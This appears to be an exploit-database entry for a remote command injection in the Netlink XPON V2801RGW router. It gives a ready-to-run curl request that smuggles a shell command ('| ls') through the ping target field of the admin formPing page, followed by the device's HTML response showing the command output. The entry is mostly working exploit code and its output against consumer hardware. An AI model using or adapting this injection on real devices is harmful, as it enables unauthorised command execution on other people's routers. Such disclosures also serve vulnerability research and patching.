Netlink XPON 1GE WiFi V2801RGW Remote Command Execution

2020.05.17
Credit: Seecko Das
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution # Google Dork: Not applicable # Date: 2020-05-13 # Exploit Author: Seecko Das # Vendor Homepage: https://www.crtindia.com/ # Version: V3.3.0-190627 # Tested on: Windows 10/Linux (Kali) # CVE: N/A Exploit : curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬ��ģ��--> <html> <head> <title>PING���Խ��</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳ����css--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳ�����ű�--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--��ҳ����--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Please wait</b> <br><br> </div> <pre> boa.conf web </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")> </div> </form> </blockquote> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top